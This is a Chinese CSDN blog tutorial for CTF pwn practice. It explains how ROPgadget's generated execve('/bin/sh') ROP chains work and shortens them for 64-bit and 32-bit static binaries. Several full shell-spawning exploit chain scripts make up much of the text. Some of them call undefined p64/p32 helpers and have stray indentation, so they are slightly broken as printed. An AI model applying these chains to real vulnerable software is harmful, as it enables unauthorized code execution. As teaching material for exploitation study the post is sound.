Ropgadget中ropchain的详细分析

已于 2024-03-27 14:18:37 修改
阅读量1.2k 收藏 37
点赞数 47
分类专栏: PWN 文章标签: linux 网络安全 安全
于 2024-03-27 01:37:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/W13680336969/article/details/137062020
版权

前言

        在静态连接程序中,利用ROPgadget生成现成的ropchain,可以直接实现getshell,主打一个方便。        

        但是,通常情况下,由于程序的输入长度有限制,而ROPgadget生成的ropchain过长,导致ropchain无法适用,如果能够针对ropchain进行简单的修改的话,那便能减少构建rop链花费的心思。

如何使用ROPgadget生成ropchain

(1)ROPgadget命令生成ropchain

ROPgadget --binary gift_rop --ropchain

(2)命令执行后,会回显一段很长的gadget段,往上滑,找到ROPgadget构造好的ropchain

(3)从 #padding goes here 开始就是ROPgadget构造好的ropchain

(4)程序没有输入限制情况下,只需将padding填入此处,就能利用现成rop链进行getshell

解析ROPgadget中ropchain原理

ROPgadget构建的ropchain本质就是执行syscall

(1)填充长度padding:

(2)将rsi设置为.data段的地址,将/bin/sh写入rax,再将rax的内容写入rsi所指向的地址

(简单来说就是借助rsi和rax两个寄存器将字符串'/bin/sh'写入.data段中)

(3)xor rax,rax指令是将寄存器rax清空为0,然后将.data+8地址处的值设置为0

(4)将rdi设置为'/bin/sh'地址,将rsi,rdx,rbx设置为0(此时@.data+8处是为0的)

(5)从padding开始直到syscall调用之前实现rax每次加1

(64位系统的调用号为59(0x3B),所以执行59次指令add rax,1)

(6)最后调用syscall函数

修改ropchain长度详解

思想:由上面的分析可以发现,ropchain在设置rax的值时,执行了59次add rax,1指令。既然知道了后续的指令都是为了将rax的值设置为59(0x3B),那能不能找到更加高效的gadget对其进行替代,从而缩短ropchain的长度呢

64位静态编译程序的rop修改

首先明白ropchain的本质是执行syscall,因此64位程序对应的syscall为:

        Syscall(0x3b ,'/bin/sh',0,0)

        目标实现:rax=0x3b ,rdi='binsh' ,rsi=0 ,rdx=0,syscall_addr

(1)ROPgadget命令查找可修改rax寄存器的gadget进行替代:

ROPgadget --binary gift_rop --ropchain |grep rax

(2)通过指令 pop rax,ret 实现设置rax的值为59(0x3B)

P64(pop_rax)+P64(0x3B)

   通过 pop rax 实现rax传值的方式,极大缩短了ropchain的长度

#!/usr/bin/env python3
# execve generated by ROPgadget
from struct import pack
# Padding goes here
p = b''

p += pack('<Q', 0x0000000000409f9e) # pop rsi ; ret
p += pack('<Q', 0x00000000004c50e0) # @ .data
p += pack('<Q', 0x0000000000448077) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000044a4f5) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000409f9e) # pop rsi ; ret
p += pack('<Q', 0x00000000004c50e8) # @ .data + 8
p += pack('<Q', 0x000000000043d1d0) # xor rax, rax ; ret
p += pack('<Q', 0x000000000044a4f5) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000401f2f) # pop rdi ; ret
p += pack('<Q', 0x00000000004c50e0) # @ .data
p += pack('<Q', 0x0000000000409f9e) # pop rsi ; ret
p += pack('<Q', 0x00000000004c50e8) # @ .data + 8
p += pack('<Q', 0x000000000047f20b) # pop rdx ; pop rbx ; ret
p += pack('<Q', 0x00000000004c50e8) # @ .data + 8
        p += pack('<Q', 0x4141414141414141) # padding
p += pack('<Q', 0x0000000000448077) # pop rax ; ret
p += p64(0x3B)
p += pack('<Q', 0x0000000000401ce4) # syscall

(3)ROPgadget命令查找可以修改rsi,rdx,rbx寄存器的gadget

ROPgadget --binary gift_rop --only 'pop|ret'|grep ret

(4)最终缩短后的ropchain

#!/usr/bin/env python3
# execve generated by ROPgadget
from struct import pack
# Padding goes here
p = b''
 
p += pack('<Q', 0x0000000000409f9e) # pop rsi ; ret
p += pack('<Q', 0x00000000004c50e0) # @ .data
p += pack('<Q', 0x0000000000448077) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000044a4f5) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000401f2f) # pop rdi ; ret
p += pack('<Q', 0x00000000004c50e0) # @ .data
p += pack('<Q', 0x0000000000409f9e) # pop rsi ; ret
p += p64(0)
p += pack('<Q', 0x000000000047f20b) # pop rdx ; pop rbx ; ret
p += p64(0)+p64(0)
        p += pack('<Q', 0x4141414141414141) # padding
p += pack('<Q', 0x0000000000448077) # pop rax ; ret
p += p64(0x3B)
p += pack('<Q', 0x0000000000401ce4) # syscall

32位静态编译程序的rop修改

32位程序对应的syscall为:

        Int80(0xb ,'/bin/sh' ,0 ,0)

        目标实现:eax=0xb ,ebx='binsh' ,ecx=0 ,edx=0 ,int0x80_addr

ROPgadget构建的ropchain:

#!/usr/bin/env python3
# execve generated by ROPgadget
from struct import pack
# Padding goes here
p = b''

p += pack('<I', 0x0806e82a) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080bae06) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x0809a15d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e82a) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080bae06) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x0809a15d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e82a) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08054250) # xor eax, eax ; ret
p += pack('<I', 0x0809a15d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x0806e851) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
        p += pack('<I', 0x080ea060) # padding without overwrite ebx
p += pack('<I', 0x0806e82a) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08054250) # xor eax, eax ; ret
p += pack('<I', 0x0807b27f) # inc eax ; ret
p += pack('<I', 0x0807b27f) # inc eax ; ret
p += pack('<I', 0x0807b27f) # inc eax ; ret
p += pack('<I', 0x0807b27f) # inc eax ; ret
p += pack('<I', 0x0807b27f) # inc eax ; ret
p += pack('<I', 0x0807b27f) # inc eax ; ret
p += pack('<I', 0x0807b27f) # inc eax ; ret
p += pack('<I', 0x0807b27f) # inc eax ; ret
p += pack('<I', 0x0807b27f) # inc eax ; ret
p += pack('<I', 0x0807b27f) # inc eax ; ret
p += pack('<I', 0x0807b27f) # inc eax ; ret
p += pack('<I', 0x080493e1) # int 0x80

(1)ROPgadget命令查找可修改eax寄存器的gadget进行替代

ROPgadget --binary simplerop --ropchain |grep eax

2)通过 pop eax,ret 实现设置eax的值为11(0xB)

P32(pop_eax)+P32(0xb)
#!/usr/bin/env python3
# execve generated by ROPgadget
from struct import pack
# Padding goes here
p = b''

p += pack('<I', 0x0806e82a) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080bae06) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x0809a15d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e82a) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080bae06) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x0809a15d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e82a) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08054250) # xor eax, eax ; ret
p += pack('<I', 0x0809a15d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x0806e851) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
        p += pack('<I', 0x080ea060) # padding without overwrite ebx
p += pack('<I', 0x0806e82a) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08054250) # xor eax, eax ; ret
p += pack('<I', 0x080bae06) # pop eax ; ret
p += p32(0xb)
p += pack('<I', 0x080493e1) # int 0x80

3ROPgadget命令查找可以修改ebx,edx,ecx寄存器的gadget

ROPgadget --binary simplerop --only 'pop|ret'|grep ret

4)最终缩短后的ropchain

#!/usr/bin/env python3
# execve generated by ROPgadget
from struct import pack
# Padding goes here
p = b''

p += pack('<I', 0x0806e82a) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080bae06) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x0809a15d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e82a) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080bae06) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x0809a15d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806e850) # pop edx ; pop ecx ; pop ebx ; ret
p += p32(0)+p32(0)+p32(0x080ea060)
        p += pack('<I', 0x080ea060) # padding without overwrite ebx
p += pack('<I', 0x080bae06) # pop eax ; ret
p += p32(0xb)
p += pack('<I', 0x080493e1) # int 0x80

总结

(1)对ropchain的优化,无非就是利用寄存器gadget来替代ROPgadget中ropchain过于复杂的操作,从而缩短ropchain的长度。

(2)一般情况下,只需要利用rax或者eax寄存器gadget替代对应部分的操作就能满足题目需求。

(3)如果再进一步利用其他寄存器gadget去替代对应部分操作,实质上与自己直接构造rop链相差无几。

Yeah_0day
关注
  • 47
    点赞
  • 37
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
exrop:自动ROPChain生成
04-23
Exrop是自动ROP链生成器工具,可以根据给定的二进制文件和约束条件自动构建小工具链 要求: , 目前仅支持x86-64! 特征: 处理单向小工具(jmp reg,call reg) 设置寄存器( rdi=0xxxxxx, rsi=0xxxxxx ) 将...
ROPgadget.zip
09-17
pip install ropgadget下载总是断的可以试试,pwn必备工具ROPgadget
ROPgadget初识 ——— ret2syscall
qq_41696518的博客
07-01 1150
PWN
pwn练习1-ret2syscall(ROP-gadget)
m0_51756263的博客
10-07 1595
pwn练习1-ret2syscall(ROP-gadget)
ROPgadget使用
最新发布
Jingged的博客
04-09 525
需要注意的是,ROPgadget只是工具的一部分,成功的ROP攻击还需要深入理解目标二进制文件的结构和行为,以及攻击场景的具体细节。此外,随着软件安全性的提高和漏洞修复的不断进行,可用的gadgets可能会变得越来越少,因此在使用ROPgadget时,最好与其他工具和技术结合起来进行更全面的分析和利用开发。ROPgadget是一种基于代码复用技术的攻击工具,它可以帮助攻击者在二进制文件找到可利用的代码片段(即ROP链的gadgets),从而构建出有效的攻击载荷。是你想要分析的二进制文件的路径,
探秘安全领域利器:`ROPgadget` - 反向工程与漏洞利用的新工具
gitblog_00017的博客
03-22 256
探秘安全领域利器:ROPgadget - 反向工程与漏洞利用的新工具 项目地址:https://gitcode.com/JonathanSalwan/ROPgadget 项目简介 在网络安全的世界里,ROPgadget 是一个非常实用的开源工具,由 Jonathan Salwan 开发并托管在 GitCode 上。它主要用于分析二进制文件,搜索可用于 Return-Oriented Program...
PWN入门之通用gadgets
weixin_44681716的博客
04-09 2758
实验目的 针对一些程序运行时的初始化函数(如加载libc.so的初始化函数),提取一些通用的gadgets,从而更利于我们继续ROP操作。 实验文件 这次实验的可执行文件文件通过我们自己编译一个程序产生,为了降低实验的难度,我们在进行编译的时候,关闭栈保护和数据执行保护(DEP)。 ...
ROPR:一款功能强大的极速多线程ROPGadget查找工具
阿道夫的博客
02-10 1437
Programming),即返回导向编程,而ROPGadget是一些包含汇编指令的代码段,通常以ret指令结尾,这些指令已经作为可执行代码存在于每个源码文件或代码库,而这些小工具可用于二进制攻击,并破坏易受攻击的可执行文件。大多数可执行文件包含足够的小工具来编写ROP链一旦我们知道了地址,就可以使用包含在同一地址空间(如libc)的动态库。而使用ROPGadget的好处在于,无需在任何地方编写新的可执行代码,攻击者可以仅使用程序已经存在的代码来实现其目标。这时候你当然需要一份系统性的学习路线。
ROPgadget:使用此工具,您可以在二进制文件搜索小工具,以方便您对ROP的利用。 ROPgadget在x86,x64,ARM,ARM64,PowerPC,SPARC和MIPS架构上支持ELF,PE和Mach-O格式
05-02
使用此工具,您可以在二进制文件搜索小工具,以方便您对ROP的利用。 ROPgadget在x86,x64,ARM,ARM64,PowerPC,SPARC和MIPS体系结构上支持ELF / PE / Mach-O格式。 从版本5开始,ROPgadget具有一个新的内核,该...
kali安装ROPgadget报错.docx
11-18
kali安装ROPgadget报错,pkg_resources.ResolutionError: Script 'scripts/ROPgadget' not found in metadata at '/usr/local/lib/python2.7/dist-packages/ROPGadget-5.9.dist-info'
Python库 | ROPGadget-6.1-py2-none-any.whl
02-20
python库,解压后可用。 资源全名:ROPGadget-6.1-py2-none-any.whl
[BUUCTF-pwn]——cmcc_simplerop (ropchain)
Y_peak的博客
03-16 447
[BUUCTF-pwn]——cmcc_simplerop 有栈溢出,自己找rop链,最简单的方法,让ROPgadget帮我们弄好呀,可是有点长,所有需要我们修改。毕竟有长度要求。因为“/bin/sh"字符串没有找到,所有这之前的都不动, 下面的pop eax; pop ebx; pop ecx; pop edx除了pop ebx 注意下,其他都可以进行修改 inc就是 ++ exploit 目的:使得excve("/bin/sh") eax = 0xb; ebx ->"/bin/sh"; ecx
非栈上格式化漏洞和手动rop链构造
2302_79899078的博客
02-24 269
地址,最后就是劫持流程。但是对于BSS段或是堆上格式化字符串,无法直接将想要改写的地址指针放置在栈上,也就没办法实现任意地址写。下面以SUCTFplayfmt为例,介绍一下常用的非栈上格式化字符串漏洞的利用方法。一般来说,栈上的格式化字符串漏洞利用步骤是先泄露地址,包括ELF程序地址和libc地址;然后将需要改写的GOT表地址直接传到栈上,同时利用。的地址,可以得到分别是第个参数和第个参数,直接传入。的基地址,这些地址可以很轻松的在栈上找到,其。首先需要得到当前栈的地址和。
君莫笑系列视频学习(4)
像初雪一样自由洒落
01-25 326
接下来,视频讲解的都是各个例子(https://space.bilibili.com/14500640/) (1)程序自身就含有system函数和"/bin/sh"字符串 (2)程序自身就有system函数,但是没有"/bin/sh"字符串 (3)程序自身就没有system函数和"/bin/sh"字符串,但给出了libc.so文件 (4)程序自身就没有system函数和"/bin/sh"...
【ubuntu20pwn环境搭建】
weixin_51055545的博客
02-23 1494
一 镜像下载 这里我给大家总结几个比较常用的网站: ubuntu官网下载:https://cn.ubuntu.com/download/desktop 清华源:https://mirror.tuna.tsinghua.edu.cn/ubuntu-releases/20.04/ 阿里云开源镜像站:http://mirrors.aliyun.com/ubuntu-releases/20.04/ 推荐使用清华源或者阿里云 二 ubuntu20安装 镜像下载好后,打开虚拟机,点击文件,选择新建虚拟机: 选择自定义
(Pwn)CTF工具 ROPgadget 的安装与使用介绍
半岛铁盒的博客
03-10 1万+
一. 介 绍 使用此工具,您可以在二进制文件搜索Gadgets,以方便您对ROP的利用。 我们知道x86都是靠栈来传递参数的而x64换了它顺序是rdi, rsi, rdx, rcx, r8, r9,(这里6个寄存器可以被理解为Gadgets)如果多于6个参数才会用栈我们要先知道这个特性. 有的题,里面既没有现成的system也没有/bin/sh字符串,也没有提供libc.so给我们,那么我们要做的就是想办法泄露libc地址,拿到system函数和/bin/sh字符串; 我们就需要获取rdi, rsi,
ROPgadget 工具
weixin_30414635的博客
03-14 5718
Install $ pip install ropgadget $ ROPgadget Usage usage: ROPgadget.py [-h] [-v] [-c] [--binary <binary>] [--opcode <opcodes>] [--string <string>] [--memstr ...
使用ROP攻击技术
热门推荐
海枫的专栏
09-28 3万+
随着64系统广泛应用,原来通过栈控制函数参数的方法已不再适用了,攻击提出ROP攻击,又展开了一场新的较量。
ROPgadget - Gadgets finder and auto-roper
核桃树
01-21 4559
Description This tool lets you search your gadgets on your binaries to facilitate your ROP exploitation. ROPgadget supports ELF/PE/Mach-O format on x86, x64, ARM, PowerPC, SPARC and MIPS architectu
ropgadget下载
11-13
ropgadget是一个用于构建ROP(Return Oriented Programming)链的工具,它能够从二进制文件提取出可供利用的ROP gadgets(即一系列具有特定功能的指令序列)。ROP链是一种在没有执行代码注入的情况下,利用程序已存在的代码片段来构造攻击的方法。 要下载ropgadget,首先需要确保系统已经安装了Python和pip(Python的包管理器)。然后可以使用以下命令来安装ropgadget: 1. 打开终端或命令提示符窗口。 2. 输入以下命令并按下回车键:pip install ropgadget 3. 该命令将自动下载并安装ropgadget及其依赖项。 安装完成后,可以使用ropgadget命令来运行该工具。例如,要在名为"binary"的二进制文件查找ROP gadgets,可以使用以下命令: ropgadget --binary binary 该命令将会在终端输出显示找到的ROP gadgets的列表,包括每个gadget的地址和指令。 使用ropgadget可以帮助安全研究人员和渗透测试人员更方便地分析目标程序的漏洞,并构建攻击载荷。通过寻找合适的ROP gadgets并组合它们,攻击者可以利用程序本身的代码段来实现特定的攻击目的,比如绕过保护机制、执行特定的系统调用、获取敏感信息等。 总之,ropgadget是一个用于构建ROP链的有用工具,它能够帮助研究人员和攻击者在没有代码注入的情况下进行攻击,因此在进行安全研究和漏洞利用方面具有重要价值。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值